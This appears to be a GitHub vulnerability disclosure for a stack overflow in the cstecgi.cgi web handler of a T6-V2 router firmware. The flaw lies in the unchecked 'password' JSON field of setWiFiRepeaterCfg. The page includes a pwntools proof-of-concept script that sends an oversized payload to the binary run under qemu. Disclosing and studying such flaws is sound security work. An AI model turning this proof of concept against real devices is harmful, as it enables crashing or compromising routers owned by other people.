Skip to content

Latest commit

 

History

History

5.setWiFiRepeaterCfg

Folders and files

NameName
Last commit message
Last commit date

parent directory

..
 
 
 
 

Overview

Affected version

T6-V2 V4.1.9cu.5179_B20201015

Vulnerability details

The vulnerability exists in the router's WEB component. /web_cste/cgi-bin/cstecgi.cgi FUN_00413f80 (at address 0x413f80) gets the JSON parameter password, but without checking its length, copies it directly to local variables in the stack, causing stack overflow:

image-20220529105156504

The program gets the JSON parameter encrypt, password, opmode. When encrypt is equal to WEP and opmode is equal to rpt, the program will enter the branch at line 268.

image-20220529105310649

PoC

from pwn import *
import json

data = {
    "topicurl": "setting/setWiFiRepeaterCfg",
    "opmode": "rpt",
    "encrypt": "WEP",
    "password": "A"*0x400,
}

data = json.dumps(data)
print(data)

argv = [
    "qemu-mipsel-static",
    "-g", "1234",
    "-L", "./root/",
    "-E", "CONTENT_LENGTH={}".format(len(data)),
    "-E", "REMOTE_ADDR=192.168.2.1",
    "./cstecgi.cgi"
]

a = process(argv=argv)
a.sendline(data.encode())

a.interactive()